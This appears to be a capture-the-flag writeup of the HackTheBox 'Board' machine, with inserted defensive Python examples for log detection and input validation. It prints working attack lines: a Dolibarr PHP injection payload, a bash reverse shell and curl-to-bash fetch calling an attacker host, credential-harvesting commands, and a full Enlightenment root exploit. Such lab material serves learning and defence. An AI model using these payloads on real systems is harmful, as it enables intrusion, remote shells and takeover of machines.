Sunday, June 2, 2024

board htb writeup

 

Hackthebox board.htb Writeup

User

  • The pentester starts with a port scan and discovers that ports 22 and 80 are open.

# Nmap 7.94SVN scan initiated Mon May 27 19:30:34 2024 as: nmap -sCV -p22,80 -n -Pn -v -oN scanPorts 10.129.67.131
Nmap scan report for 10.129.67.131
Host is up (2.3s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_  256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 27 19:30:55 2024 -- 1 IP address (1 host up) scanned in 21.78 seconds
  • Since there are no interesting public exploits for OpenSSH 8.2 and the pentester has no credentials for the service, port 80 is the more promising place to look for vulnerabilities.

  • The pentester noticed that the website on port 80 belongs to BoardLight, a cybersecurity consulting firm. After inspecting the website thoroughly, he did not find any vulnerable functionality. However, he noticed a possible domain name for the website: board.htb


  • As a result, the pentester tried to find subdomains. First, he added the domain to /etc/hosts with the following command.

sudo tee -a /etc/hosts <<< "10.129.67.131 board.htb"
  • Then the pentester ran subdomain fuzzing with ffuf using the following command, aiming to find a subdomain.

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -ic -t 200 -c -fs 15949

Comments: Something worth mentioning is that the tool 'ffuf' (like the 'Burp Suite' proxy) performs a character count of the response body, which is shown in the 'size' field of its output. This can be observed around line 200 of ffuf's Go source in the file simple.go.

To discover the new subdomain it is necessary to filter on the size field, because for non-existent subdomains the response code is still 200 OK and the body is the default response of the board.htb domain. To obtain the -fs value corresponding to board.htb, use the following command.


curl -s http://board.htb | wc -c
# 15949

It's worth noting that the same information could have been obtained by passing the request through the 'Burp Suite' proxy, where it is available in the 'Content-Length' response header, or by inspecting the Network tab of your preferred browser, as illustrated in the following image.
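From the defender's side, a Host-header fuzzing run like the one above leaves a distinctive footprint: one client requests dozens of different virtual host names in seconds, and every one of them gets the same 200 OK default page, so status-code alerting never fires. The following script is an added example (it is not part of the original writeup and not ffuf's code) that flags that pattern in Apache access logs. It assumes the server has been configured to log the Host request header as a final quoted field (the stock "combined" format does not record it); the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Assumed Apache LogFormat (the stock "combined" format does NOT record the
# Host header, so it is appended here as a final quoted field):
#   "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\" \"%{Host}i\""
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "[^"]*" "(?P<host>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def detect_vhost_fuzzing(lines, window_seconds=60, threshold=20):
    """Return {client_ip: max_distinct_hosts} for every client that requested
    more than `threshold` distinct Host values inside any `window_seconds`
    window. The Host header is the signal: the default vhost answers every
    name with the same 200 page, so response codes alone show nothing."""
    per_client = defaultdict(list)          # ip -> [(timestamp, host)]
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            per_client[rec["ip"]].append((rec["ts"], rec["host"]))

    flagged = {}
    for ip, events in per_client.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span fits window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {host for _, host in events[start:end + 1]}
            if len(distinct) > threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct))
    return flagged


# Constructed sample: one client cycling through 25 candidate Host headers in
# 25 seconds (every answer is the 200 / 15949-byte default page), plus a
# second client browsing normally.
_FUZZ_WORDS = ("www mail ftp dev api crm test admin blog shop vpn ns1 ns2 smtp portal "
               "staging cdn m app secure beta docs wiki git support").split()
SAMPLE_LOG = [
    '10.10.14.80 - - [27/May/2024:19:40:%02d +0000] "GET / HTTP/1.1" 200 15949 '
    '"-" "Mozilla/5.0" "%s.board.htb"' % (i, w)
    for i, w in enumerate(_FUZZ_WORDS)
] + [
    '10.10.14.81 - - [27/May/2024:19:40:05 +0000] "GET / HTTP/1.1" 200 15949 '
    '"-" "Mozilla/5.0" "board.htb"',
    '10.10.14.81 - - [27/May/2024:19:40:09 +0000] "GET /index.php HTTP/1.1" 200 6360 '
    '"http://board.htb/" "Mozilla/5.0" "crm.board.htb"',
]

if __name__ == "__main__":
    for ip, count in detect_vhost_fuzzing(SAMPLE_LOG).items():
        print("possible vhost fuzzing from %s: %d distinct Host values" % (ip, count))
```

The window and threshold are starting points to tune against your own traffic; a CDN or a site with many legitimate aliases will need a higher threshold, while a single-name server can alert on far fewer distinct names.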



 

  • Great! The pentester discovered the subdomain crm.board.htb. He added this subdomain to the /etc/hosts file and proceeded to analyse it further.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 15949
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 176ms]
  • Upon accessing the subdomain crm.board.htb, the pentester noticed that it runs Dolibarr 17.0.0. A quick search for vulnerabilities in this version led to a PHP code injection, CVE-2023-30253. This vulnerability essentially allows bypassing the security controls that prevent an unprivileged user from adding or editing dynamic PHP content (an action normally restricted to developers). It also circumvents the blacklist of certain dangerous PHP functions such as system, exec, etc., ultimately allowing remote code execution (RCE).
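The payloads used later in this writeup open with mixed-case tags (<?PhP, <?PHP), which is the detail a weak filter trips over. The snippet below is an added, illustrative example; it is not Dolibarr's code and does not reproduce the exact check that CVE-2023-30253 bypassed. naive_contains_php stands in for a filter that only recognises the lowercase open tag, contains_php and dangerous_calls are the hardened forms, and is_acceptable_dynamic_content is an assumed policy wrapper.

```python
import re

# PHP's lexer accepts the open tag in any case (<?php, <?PHP, <?PhP) and the
# short echo tag <?= regardless of short_open_tag, so a filter that only looks
# for the lowercase spelling can be walked around with one capital letter.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# PHP function names are case-insensitive as well: SYSTEM("id") calls system(),
# so a denylist that matches only lowercase names is just as weak.
DANGEROUS_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
DANGEROUS_CALL = re.compile(
    r"\b(" + "|".join(DANGEROUS_FUNCS) + r")\s*\(", re.IGNORECASE)


def naive_contains_php(content):
    """Case-sensitive stand-in for the weak check (assumption, not Dolibarr's
    code): misses <?PHP, <?PhP and <?=."""
    return "<?php" in content


def contains_php(content):
    """Hardened check: any PHP open tag, in any letter case."""
    return PHP_OPEN_TAG.search(content) is not None


def dangerous_calls(content):
    """Return the sorted, lower-cased names of denylisted functions called in
    `content`, whatever case the author typed them in."""
    return sorted({m.group(1).lower() for m in DANGEROUS_CALL.finditer(content)})


def is_acceptable_dynamic_content(content, author_is_admin):
    """Assumed policy: non-admins may not submit PHP at all; admins may, but
    never calls to the denylisted functions."""
    if contains_php(content):
        if not author_is_admin:
            return False
        if dangerous_calls(content):
            return False
    return True


if __name__ == "__main__":
    # The first payload is the test string from this writeup; the second is
    # a constructed mixed-case call.
    for sample in ('<?PhP echo "Testing" . ": CVE-2023-30253";?>',
                   '<?PHP SyStEm("id"); Shell_Exec("ls"); ?>'):
        print(repr(sample), "naive:", naive_contains_php(sample),
              "hardened:", contains_php(sample), "calls:", dangerous_calls(sample))
```

Even the hardened version is still a denylist, and PHP offers many execution paths beyond the six names above; the durable control is that only trusted administrators may author PHP in the first place, together with upgrading to a patched Dolibarr release.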


  • To exploit this vulnerability, authentication in Dolibarr is required. A quick search for this software's default credentials yields: admin:admin.


  • He tried to log in with those credentials. Boom! He could authenticate to Dolibarr. However, to exploit this vulnerability it is necessary to have access to a page belonging to a website whose source code can be modified. Unfortunately, there wasn't one available. Therefore, I created a website with the following steps.

  • He modified the page's source code with the following content to check whether the vulnerability can be exploited.

<?PhP echo "Testing" . ": CVE-2023-30253";?>


  • To receive a reverse shell, he hosted a file pwn.html on an HTTP server with the following content:

bash -i>&/dev/tcp/10.10.14.80/4444 0>&1
  • And then, he executed the following PHP code.

<?PHP system("curl -s http://10.10.14.80/pwn.html|bash");?>
  • Nice!! He obtained a reverse shell and then stabilised it.


  • Since he had access to the server as the user www-data, he searched for connection strings or hard-coded credentials in files. For this purpose, he ran the following command.

grep -arin 'DB_USER\|DB_PASSWORD' |awk -F':' '{print $1}' | sort | uniq -c 
 
 

  • After reviewing those files, the pentester found a password (serverfun2$2023!!) for the MySQL service.


  • User enumeration reveals the existence of the user larissa.

grep -P ".*sh$" /etc/passwd
 
 

  • Assuming credential reuse, the pentester tried to switch to the user larissa discovered earlier. Success! He switched to the user larissa and read the file /home/larissa/user.txt.

Root

  • With access as the user larissa, the pentester continues enumerating in order to escalate privileges to root, now with the new privileges and permissions of this user. He searches for SUID binaries and identifies uncommon binaries with the SUID bit set, in particular those related to Enlightenment.

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
 
 

Tip: These binaries deserve extra attention: curiously, the SUID bit is set on binaries belonging to EnLIGHTenment (one of the main Linux window managers), whose name has a certain relationship with the machine name (BoardLIGHT).

  • A quick search for vulnerabilities in the Enlightenment desktop environment led to CVE-2022-37706, discovered by MaherAzzouzi, which allows privilege escalation to root. Essentially, CVE-2022-37706 is a command injection exploiting a logic bug caused by repeated calls to the eina_strbuf_append_printf() function. An excellent explanation can be found on MaherAzzouzi's GitHub page. The pentester therefore used that Proof of Concept (PoC) for privilege escalation.

mkdir /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/bash" > /tmp/exploit
chmod a+x /tmp/exploit
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
  • Finally, he ran this PoC and succeeded! The pentester was able to read the file /root/root.txt.
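The PoC works because a path containing a ';' ends up inside a command line that a shell parses, and because the '/dev/../tmp' prefix passes a trust check that was done before the path was normalised. The following is an added, illustrative example (not enlightenment_sys's code and not a reproduction of the exact logic behind CVE-2022-37706) that puts the vulnerable string-building pattern beside the argv form a setuid helper should use, and shows the input validation a defender would expect; build_shell_command, build_argv, shell_would_split, safe_shell_string and mount_source_error are all assumed names, and nothing here actually runs mount.

```python
import os
import shlex

# Assumption for the illustration: only device nodes below /dev may be mounted.
TRUSTED_MOUNT_ROOT = "/dev"


def build_shell_command(source, target, options):
    """Vulnerable pattern: caller-controlled strings are pasted into one
    command line that is later handed to a shell (system(3) style). A source
    of '/tmp/;/tmp/exploit' becomes two commands."""
    return "/bin/mount -o %s %s %s" % (options, source, target)


def build_argv(source, target, options):
    """Safe pattern: every value is exactly one argv element for execve(2),
    so no shell ever parses it and ';' is just a character in a path."""
    return ["/bin/mount", "-o", options, source, target]


def safe_shell_string(argv):
    """If a shell string is unavoidable, quote every element individually."""
    return " ".join(shlex.quote(arg) for arg in argv)


def shell_would_split(cmd):
    """Tokenise `cmd` the way a POSIX shell would and return the list of
    separate commands it contains (split on ';')."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token == ";":
            commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def mount_source_error(source):
    """Defensive input check for a privileged helper. Returns None if `source`
    is acceptable, otherwise the reason. The path is normalised *before* the
    prefix test, so '/dev/../tmp/...' cannot pass as something under /dev."""
    normalised = os.path.normpath(source)
    if normalised != TRUSTED_MOUNT_ROOT and not normalised.startswith(TRUSTED_MOUNT_ROOT + os.sep):
        return "mount source outside %s: %r" % (TRUSTED_MOUNT_ROOT, source)
    if any(ch in source for ch in ";|&$`\n\"'"):
        return "shell metacharacter in mount source: %r" % source
    return None


if __name__ == "__main__":
    # Constructed inputs echoing the shape of the PoC above.
    source, target, opts = "/dev/../tmp/;/tmp/exploit", "/tmp///net", "noexec,nosuid"
    print("shell string splits into:", shell_would_split(build_shell_command(source, target, opts)))
    print("argv keeps it as one arg:", build_argv(source, target, opts))
    print("validation says:", mount_source_error(source))
```

The two lessons are independent: an argv-based exec removes the shell from the picture entirely, and canonicalising a path before comparing it against a trusted prefix is what stops a '..' component from smuggling an untrusted location past the check. Quoting (safe_shell_string) is the fallback when a shell string truly cannot be avoided, not the first choice.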


I hope you had as much fun reading this write up as I did hacking it. Happy Hacking!!👾
